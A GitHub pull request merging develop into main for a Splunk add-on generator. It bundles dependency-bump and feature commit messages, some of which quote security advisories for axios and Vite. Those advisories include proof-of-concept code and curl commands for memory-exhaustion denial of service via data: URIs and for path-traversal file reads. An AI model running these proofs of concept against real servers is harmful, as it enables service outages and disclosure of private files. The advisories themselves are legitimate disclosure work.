chore: merge develop into main #1928
Open
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs from Renovate will soon appear from 'Mend'. Learn more [here](https://redirect.github.com/renovatebot/renovate/discussions/37842). This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/checkout](https://redirect.github.com/actions/checkout) | action | major | `v4` -> `v5` | | [actions/download-artifact](https://redirect.github.com/actions/download-artifact) | action | major | `v4` -> `v5` | | [actions/github-script](https://redirect.github.com/actions/github-script) | action | major | `v7` -> `v8` | | [actions/setup-node](https://redirect.github.com/actions/setup-node) | action | major | `v4` -> `v5` | | [actions/setup-python](https://redirect.github.com/actions/setup-python) | action | major | `v5` -> `v6` | --- ### Release Notes <details> <summary>actions/checkout (actions/checkout)</summary> ### [`v5`](https://redirect.github.com/actions/checkout/compare/v4...v5) [Compare Source](https://redirect.github.com/actions/checkout/compare/v4...v5) </details> <details> <summary>actions/download-artifact (actions/download-artifact)</summary> ### [`v5`](https://redirect.github.com/actions/download-artifact/compare/v4...v5) [Compare Source](https://redirect.github.com/actions/download-artifact/compare/v4...v5) </details> <details> <summary>actions/github-script (actions/github-script)</summary> ### [`v8`](https://redirect.github.com/actions/github-script/releases/tag/v8): .0.0 [Compare Source](https://redirect.github.com/actions/github-script/compare/v7...v8) ##### What's Changed - Update Node.js version support to 24.x by [@​salmanmkc](https://redirect.github.com/salmanmkc) in [#​637](https://redirect.github.com/actions/github-script/pull/637) - README for updating actions/github-script from v7 to v8 by [@​sneha-krip](https://redirect.github.com/sneha-krip) in [#​653](https://redirect.github.com/actions/github-script/pull/653) #####⚠️ Minimum Compatible Runner Version **v2.327.1**\ [Release Notes](https://redirect.github.com/actions/runner/releases/tag/v2.327.1) Make sure your runner is updated to this version or newer to use this release. ##### New Contributors - [@​salmanmkc](https://redirect.github.com/salmanmkc) made their first contribution in [#​637](https://redirect.github.com/actions/github-script/pull/637) - [@​sneha-krip](https://redirect.github.com/sneha-krip) made their first contribution in [#​653](https://redirect.github.com/actions/github-script/pull/653) **Full Changelog**: <actions/github-script@v7.1.0...v8.0.0> </details> <details> <summary>actions/setup-node (actions/setup-node)</summary> ### [`v5`](https://redirect.github.com/actions/setup-node/compare/v4...v5) [Compare Source](https://redirect.github.com/actions/setup-node/compare/v4...v5) </details> <details> <summary>actions/setup-python (actions/setup-python)</summary> ### [`v6`](https://redirect.github.com/actions/setup-python/compare/v5...v6) [Compare Source](https://redirect.github.com/actions/setup-python/compare/v5...v6) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "every 2 weeks on Sunday" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/splunk/addonfactory-ucc-generator). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS43MS4xIiwidXBkYXRlZEluVmVyIjoiNDEuMTMwLjEiLCJ0YXJnZXRCcmFuY2giOiJkZXZlbG9wIiwibGFiZWxzIjpbXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs from Renovate will soon appear from 'Mend'. Learn more [here](https://redirect.github.com/renovatebot/renovate/discussions/37842). This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [axios](https://axios-http.com) ([source](https://redirect.github.com/axios/axios)) | [`^1.11.0` -> `^1.12.0`](https://renovatebot.com/diffs/npm/axios/1.11.0/1.12.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-58754](https://redirect.github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj) ## Summary When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`. ## Details The Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob. Relevant code from [`[httpAdapter](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231): ```js const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls); const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined); const protocol = parsed.protocol || supportedProtocols[0]; if (protocol === 'data:') { let convertedData; if (method !== 'GET') { return settle(resolve, reject, { status: 405, ... }); } convertedData = fromDataURI(config.url, responseType === 'blob', { Blob: config.env && config.env.Blob }); return settle(resolve, reject, { data: convertedData, status: 200, ... }); } ``` The decoder is in [`[lib/helpers/fromDataURI.js](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27): ```js export default function fromDataURI(uri, asBlob, options) { ... if (protocol === 'data') { uri = protocol.length ? uri.slice(protocol.length + 1) : uri; const match = DATA_URL_PATTERN.exec(uri); ... const body = match[3]; const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8'); if (asBlob) { return new _Blob([buffer], {type: mime}); } return buffer; } throw new AxiosError('Unsupported protocol ' + protocol, ...); } ``` * The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks. * It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams. * As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory. In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs. ## PoC ```js const axios = require('axios'); async function main() { // this example decodes ~120 MB const base64Size = 160_000_000; // 120 MB after decoding const base64 = 'A'.repeat(base64Size); const uri = 'data:application/octet-stream;base64,' + base64; console.log('Generating URI with base64 length:', base64.length); const response = await axios.get(uri, { responseType: 'arraybuffer' }); console.log('Received bytes:', response.data.length); } main().catch(err => { console.error('Error:', err.message); }); ``` Run with limited heap to force a crash: ```bash node --max-old-space-size=100 poc.js ``` Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error: ``` <--- Last few GCs ---> … FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory 1: 0x… node::Abort() … … ``` Mini Real App PoC: A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS. ```js import express from "express"; import morgan from "morgan"; import axios from "axios"; import http from "node:http"; import https from "node:https"; import { PassThrough } from "node:stream"; const keepAlive = true; const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 }); const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 }); const axiosClient = axios.create({ timeout: 10000, maxRedirects: 5, httpAgent, httpsAgent, headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" }, validateStatus: c => c >= 200 && c < 400 }); const app = express(); const PORT = Number(process.env.PORT || 8081); const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb"; app.use(express.json({ limit: BODY_LIMIT })); app.use(morgan("combined")); app.get("/healthz", (req,res)=>res.send("ok")); /** * POST /preview { "url": "<http|https|data URL>" } * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector). */ app.post("/preview", async (req, res) => { const url = req.body?.url; if (!url) return res.status(400).json({ error: "missing url" }); let u; try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); } // Developer allows using data:// in the allowlist const allowed = new Set(["http:", "https:", "data:"]); if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" }); const controller = new AbortController(); const onClose = () => controller.abort(); res.on("close", onClose); const before = process.memoryUsage().heapUsed; try { const r = await axiosClient.get(u.toString(), { responseType: "stream", maxContentLength: 8 * 1024, // Axios will ignore this for data: maxBodyLength: 8 * 1024, // Axios will ignore this for data: signal: controller.signal }); // stream only the first 64KB back const cap = 64 * 1024; let sent = 0; const limiter = new PassThrough(); r.data.on("data", (chunk) => { if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); } else { sent += chunk.length; limiter.write(chunk); } }); r.data.on("end", () => limiter.end()); r.data.on("error", (e) => limiter.destroy(e)); const after = process.memoryUsage().heapUsed; res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2)); limiter.pipe(res); } catch (err) { const after = process.memoryUsage().heapUsed; res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2)); res.status(502).json({ error: String(err?.message || err) }); } finally { res.off("close", onClose); } }); app.listen(PORT, () => { console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`); console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`); }); ``` Run this app and send 3 post requests: ```sh SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \ | tee payload.json >/dev/null seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @​payload.json -o /dev/null``` ``` --- ## Suggestions 1. **Enforce size limits** For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit. 2. **Stream decoding** Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large. --- ### Release Notes <details> <summary>axios/axios (axios)</summary> ### [`v1.12.0`](https://redirect.github.com/axios/axios/blob/HEAD/CHANGELOG.md#1120-2025-09-11) [Compare Source](https://redirect.github.com/axios/axios/compare/v1.11.0...v1.12.0) ##### Bug Fixes - adding build artifacts ([9ec86de](https://redirect.github.com/axios/axios/commit/9ec86de257bfa33856571036279169f385ed92bd)) - dont add dist on release ([a2edc36](https://redirect.github.com/axios/axios/commit/a2edc3606a4f775d868a67bb3461ff18ce7ecd11)) - **fetch-adapter:** set correct Content-Type for Node FormData ([#​6998](https://redirect.github.com/axios/axios/issues/6998)) ([a9f47af](https://redirect.github.com/axios/axios/commit/a9f47afbf3224d2ca987dbd8188789c7ea853c5d)) - **node:** enforce maxContentLength for data: URLs ([#​7011](https://redirect.github.com/axios/axios/issues/7011)) ([945435f](https://redirect.github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593)) - package exports ([#​5627](https://redirect.github.com/axios/axios/issues/5627)) ([aa78ac2](https://redirect.github.com/axios/axios/commit/aa78ac23fc9036163308c0f6bd2bb885e7af3f36)) - **params:** removing '\[' and ']' from URL encode exclude characters ([#​3316](https://redirect.github.com/axios/axios/issues/3316)) ([#​5715](https://redirect.github.com/axios/axios/issues/5715)) ([6d84189](https://redirect.github.com/axios/axios/commit/6d84189349c43b1dcdd977b522610660cc4c7042)) - release pr run ([fd7f404](https://redirect.github.com/axios/axios/commit/fd7f404488b2c4f238c2fbe635b58026a634bfd2)) - **types:** change the type guard on isCancel ([#​5595](https://redirect.github.com/axios/axios/issues/5595)) ([0dbb7fd](https://redirect.github.com/axios/axios/commit/0dbb7fd4f61dc568498cd13a681fa7f907d6ec7e)) ##### Features - **adapter:** surface low‑level network error details; attach original error via cause ([#​6982](https://redirect.github.com/axios/axios/issues/6982)) ([78b290c](https://redirect.github.com/axios/axios/commit/78b290c57c978ed2ab420b90d97350231c9e5d74)) - **fetch:** add fetch, Request, Response env config variables for the adapter; ([#​7003](https://redirect.github.com/axios/axios/issues/7003)) ([c959ff2](https://redirect.github.com/axios/axios/commit/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b)) - support reviver on JSON.parse ([#​5926](https://redirect.github.com/axios/axios/issues/5926)) ([2a97634](https://redirect.github.com/axios/axios/commit/2a9763426e43d996fd60d01afe63fa6e1f5b4fca)), closes [#​5924](https://redirect.github.com/axios/axios/issues/5924) - **types:** extend AxiosResponse interface to include custom headers type ([#​6782](https://redirect.github.com/axios/axios/issues/6782)) ([7960d34](https://redirect.github.com/axios/axios/commit/7960d34eded2de66ffd30b4687f8da0e46c4903e)) ##### Contributors to this release - <img src="https://avatars.githubusercontent.com/u/22686401?v=4&s=18" alt="avatar" width="18"/> [Willian Agostini](https://redirect.github.com/WillianAgostini "+132/-16760 (#​7002 #​5926 #​6782 )") - <img src="https://avatars.githubusercontent.com/u/12586868?v=4&s=18" alt="avatar" width="18"/> [Dmitriy Mozgovoy](https://redirect.github.com/DigitalBrainJS "+4263/-293 (#​7006 #​7003 )") - <img src="https://avatars.githubusercontent.com/u/53833811?v=4&s=18" alt="avatar" width="18"/> [khani](https://redirect.github.com/mkhani01 "+111/-15 (#​6982 )") - <img src="https://avatars.githubusercontent.com/u/7712804?v=4&s=18" alt="avatar" width="18"/> [Ameer Assadi](https://redirect.github.com/AmeerAssadi "+123/-0 (#​7011 )") - <img src="https://avatars.githubusercontent.com/u/70265727?v=4&s=18" alt="avatar" width="18"/> [Emiedonmokumo Dick-Boro](https://redirect.github.com/emiedonmokumo "+55/-35 (#​6998 )") - <img src="https://avatars.githubusercontent.com/u/47859767?v=4&s=18" alt="avatar" width="18"/> [Zeroday BYTE](https://redirect.github.com/opsysdebug "+8/-8 (#​6980 )") - <img src="https://avatars.githubusercontent.com/u/4814473?v=4&s=18" alt="avatar" width="18"/> [Jason Saayman](https://redirect.github.com/jasonsaayman "+7/-7 (#​6985 #​6985 )") - <img src="https://avatars.githubusercontent.com/u/13010755?v=4&s=18" alt="avatar" width="18"/> [최예찬](https://redirect.github.com/HealGaren "+5/-7 (#​5715 )") - <img src="https://avatars.githubusercontent.com/u/7002604?v=4&s=18" alt="avatar" width="18"/> [Gligor Kotushevski](https://redirect.github.com/gligorkot "+3/-1 (#​5627 )") - <img src="https://avatars.githubusercontent.com/u/15893?v=4&s=18" alt="avatar" width="18"/> [Aleksandar Dimitrov](https://redirect.github.com/adimit "+2/-1 (#​5595 )") </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/splunk/addonfactory-ucc-generator). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjEzMC4xIiwidGFyZ2V0QnJhbmNoIjoiZGV2ZWxvcCIsImxhYmVscyI6W119--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
**Issue number:** https://splunk.atlassian.net/browse/ADDON-78730 ### PR Type **What kind of change does this PR introduce?** * [X] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [ ] Documentation Update * [ ] Maintenance (dependency updates, CI, etc.) ## Summary Added datepicker component to UI (using '@splunk/react-ui/Date') for modular inputs to facilitate the specification of date information. ### Changes - added datepicker component to UI (using '@splunk/react-ui/Date') - added unit tests and storyboard file for this component - added section about this component to documentation ### User experience You can add the following to your **`globalConfig.json`**: ```json { "type": "date", "field": "example_date", "label": "Example Date", "help": "This is an example date field for the input one entity", "required": true }, ``` This generates a Datepicker component as shown below: <img width="1019" alt="datepicker_component" src="https://github.com/user-attachments/assets/d3681168-5b63-464c-8703-95a65fb9a3d9" /> ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [X] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [X] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [X] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [ ] Unit - tests have been added/modified to cover the changes * [ ] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** I can make myself available for a time that suits you. *Reviewers are encouraged to request meetings or demos if any part of the change is unclear* --------- Signed-off-by: Sebastian Schimper <[email protected]> Co-authored-by: Sebastian Schimper <[email protected]> Co-authored-by: srv-rr-github-token <[email protected]> Co-authored-by: Kamil Kędziak <[email protected]>
**Issue number:** ADDON-80800 ### PR Type **What kind of change does this PR introduce?** * [ ] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [ ] Documentation Update * [x] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Pipeline updates that fix the errors and enable running of TA tests, by specifying an additional parameter. ### User experience No user experience changes. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [x] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [x] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [ ] Unit - tests have been added/modified to cover the changes * [ ] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
**Issue number:** ### PR Type **What kind of change does this PR introduce?** * [ ] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [ ] Documentation Update * [x] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Please provide a summary of the changes. ### User experience Please describe the user experience before and after this change. Screenshots are welcome for additional context. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [ ] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [ ] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [ ] Unit - tests have been added/modified to cover the changes * [ ] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
**Issue number:** Issue #1913 ADDON-83527 ### PR Type **What kind of change does this PR introduce?** * [x] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [x] Documentation Update * [ ] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Previously, when a user specified a custom build path using the `--o/--output` parameter, the entire `output_path` was cleaned before building the add-on. This could result in unintended loss of existing files in that directory. Therefore, added a new flag`--overwrite` for the build command. Now, we only attempt to clean the `output_path/<ta_name>` directory if the --overwrite flag is provided. If the --overwrite flag is not passed and the `output_path/<ta_name>` directory already exists, the build will fail and prompt the user to either pass the --overwrite flag or choose a different output path. ### User experience User files and directories will no longer be unintentionally deleted when a custom build path is provided using the `--o/--output` parameter. If the `output_path/<ta_name>` directory already exists, users must explicitly pass the `--overwrite` flag to allow it to be overwritten. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [x] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [x] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [x] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [x] Unit - tests have been added/modified to cover the changes * [ ] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [x] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
**Issue number:** ### PR Type **What kind of change does this PR introduce?** * [ ] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [x] Documentation Update * [ ] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Small documentation fix. ### User experience No changes. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [x] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [x] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [ ] Unit - tests have been added/modified to cover the changes * [ ] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs from Renovate will soon appear from 'Mend'. Learn more [here](https://redirect.github.com/renovatebot/renovate/discussions/37842). This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`7.1.4` -> `7.1.5`](https://renovatebot.com/diffs/npm/vite/7.1.4/7.1.5) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-58752](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq24-v9c3) ### Summary Any HTML files on the machine were served regardless of the `server.fs` settings. ### Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) - `appType: 'spa'` (default) or `appType: 'mpa'` is used This vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served. ### Details The [serveStaticMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L123) function is in charge of serving static files from the server. It returns the [viteServeStaticMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L136) function which runs the needed tests and serves the page. The viteServeStaticMiddleware function [checks if the extension of the requested file is ".html"](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L144). If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case [htmlFallbackMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/htmlFallback.ts#L14), and then to [indexHtmlMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/indexHtml.ts#L438). These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client. ### PoC Execute the following shell commands: ``` npm create vite@latest cd vite-project/ echo "secret" > /tmp/secret.html npm install npm run dev ``` Then, in a different shell, run the following command: `curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'` The contents of /tmp/secret.html will be returned. This will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell: ``` echo 'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, "secret_files/*")]}}})' > [vite.config.js](http://vite.config.js) mkdir secret_files echo "secret txt" > secret_files/secret.txt echo "secret html" > secret_files/secret.html npm run dev ``` Then, in a different shell, run the following command: `curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'` You will receive a 403 HTTP Response, because everything in the secret_files directory is denied. Now in the same shell run the following command: `curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'` You will receive the contents of secret_files/secret.html. #### [CVE-2025-58751](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2w9-997c) ### Summary Files starting with the same name with the public directory were served bypassing the `server.fs` settings. ### Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) - uses [the public directory feature](https://vite.dev/guide/assets.html#the-public-directory) (enabled by default) - a symlink exists in the public directory ### Details The [servePublicMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L79) function is in charge of serving public files from the server. It returns the [viteServePublicMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L106) function which runs the needed tests and serves the page. The viteServePublicMiddleware function [checks if the publicFiles variable is defined](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L111), and then uses it to determine if the requested page is public. In the case that the publicFiles is undefined, the code will treat the requested page as a public page, and go on with the serving function. [publicFiles may be undefined if there is a symbolic link anywhere inside the public directory](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/publicDir.ts#L21). In that case, every requested page will be passed to the public serving function. The serving function is based on the [sirv](https://redirect.github.com/lukeed/sirv) library. Vite patches the library to add the possibility to test loading access to pages, but when the public page middleware [disables this functionality](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L89) since public pages are meant to be available always, regardless of whether they are in the allow or deny list. In the case of public pages, the serving function is [provided with the path to the public directory](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L85) as a root directory. The code of the sirv library [uses the join function to get the full path to the requested file](https://redirect.github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L42). For example, if the public directory is "/www/public", and the requested file is "myfile", the code will join them to the string "/www/public/myfile". The code will then pass this string to the normalize function. Afterwards, the code will [use the string's startsWith function](https://redirect.github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L43) to determine whether the created path is within the given directory or not. Only if it is, it will be served. Since [sirv trims the trailing slash of the public directory](https://redirect.github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L119), the string's startsWith function may return true even if the created path is not within the public directory. For example, if the server's root is at "/www", and the public directory is at "/www/p", if the created path will be "/www/private.txt", the startsWith function will still return true, because the string "/www/private.txt" starts with "/www/p". To achieve this, the attacker will use ".." to ask for the file "../private.txt". The code will then join it to the "/www/p" string, and will receive "/www/p/../private.txt". Then, the normalize function will return "/www/private.txt", 